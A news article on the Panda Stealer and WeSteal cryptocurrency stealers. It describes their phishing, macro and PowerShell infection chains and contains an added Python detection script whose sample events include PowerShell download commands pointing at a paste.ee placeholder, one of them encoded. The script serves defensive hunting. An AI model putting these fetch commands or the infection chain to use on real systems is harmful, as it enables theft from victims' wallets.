Panda Stealer and Westeal Malware are Targeting Cryptocurrency Wallets

Over the past few years, several new strains of malware have been created to harness the power of victims' PCs to mine various types of cryptocurrency.

More recently, some enterprising cybercriminals have decided that it would be easier to just bypass the entire mining phase for the new digital currency that's been all the rage over the past several years, and go right to users' digital wallets, or attack funds temporarily held on computer clipboards.

What Are the Newest Security Threats Against Cryptocurrency?

A new malware strain, dubbed Panda Stealer by researchers, and a cryptocurrency-related malware program named WeSteal are making headlines as they steal copious amounts of cryptocurrency.

Panda Stealer spreads through phishing emails and malicious Discord links. The phishing emails purport to be business quote requests and carry an XLSM attachment containing macros. Once the recipient enables the macros, they download a "loader" that executes the main "stealer" app.

If Panda Stealer doesn't get you that way, it may also infect you via an XLS file containing a formula that hides a PowerShell command. That command accesses paste.ee, a paste service that is an alternative to Pastebin, and then downloads another PowerShell command. Once running, Panda Stealer attempts to detect keystrokes, steal addresses, and commandeer other data associated with cryptocurrency transactions and wallets. It has been known to attack cryptocurrencies including Dash, Bytecoin, Litecoin, and Ethereum.
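The infection chain described above (Excel launching PowerShell, which then reaches out to paste.ee) can be hunted for in process-creation telemetry. The following is an added example, not code from the article or from the researchers it cites. It assumes events are available as dictionaries using the Sysmon Event ID 1 field names `ParentImage`, `Image` and `CommandLine`; the sample events, the paste ID and the helper names are constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"excel.exe"}                  # the document host named in the article
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PASTE_HOSTS = ("paste.ee",)                     # extend with other paste services as needed
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)  # -e / -enc / -EncodedCommand

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def expand_command(cmdline):
    """Lower-cased command line plus any decoded -EncodedCommand payload."""
    text = cmdline
    for blob in ENC_FLAG.findall(cmdline):
        try:  # PowerShell encodes the payload as base64 over UTF-16LE
            text += " " + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:
            pass  # the flag matched but the value was not an encoded command
    return text.lower()

def triage(event):
    """Return the findings raised by one process-creation event."""
    findings = []
    if (basename(event.get("ParentImage", "")) in OFFICE_PARENTS
            and basename(event.get("Image", "")) in SCRIPT_CHILDREN):
        findings.append("office-spawned-shell")
    text = expand_command(event.get("CommandLine", ""))
    if any(host in text for host in PASTE_HOSTS):
        findings.append("paste-site-in-command")
    return findings

def enc_sample(cmd):  # builds a constructed -EncodedCommand value for the samples
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
URL = "https://paste.ee/r/EXAMPLE"              # placeholder paste ID
SAMPLE_EVENTS = [                               # constructed, not real telemetry
    {"ParentImage": XL, "Image": PS, "CommandLine": f"powershell.exe -c iwr {URL}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + enc_sample(f"iwr {URL}")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event) or "clean", "|", event["CommandLine"][:60])
```

The second sample shows why the encoded payload is decoded before matching: the paste.ee reference is invisible in the raw command line.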

The other new threat, Westeal, is the newest incarnation of Wesupply Crypto Stealer, another strain of malicious code that has been available on the dark net since May 2020. According to researchers, Westeal has been available for sale since mid-February 2021.


Westeal website image - Source: ZDnet.com

Westeal seems to be primarily designed to steal Bitcoin and Ethereum as they pass in and out of the victim's wallet via the clipboard. Additionally, people who purchase the Westeal app get access to a web panel to conveniently handle all their nefarious operations, including a "victim tracker panel."

At this time, Palo Alto Networks is claiming that Westeal is immune to major antivirus software. Although the natural evolution of the economy has led many to cryptocurrency, a number of those individuals have less than honorable intentions. These two latest schemes prove that criminality continues to move at the speed of technology.
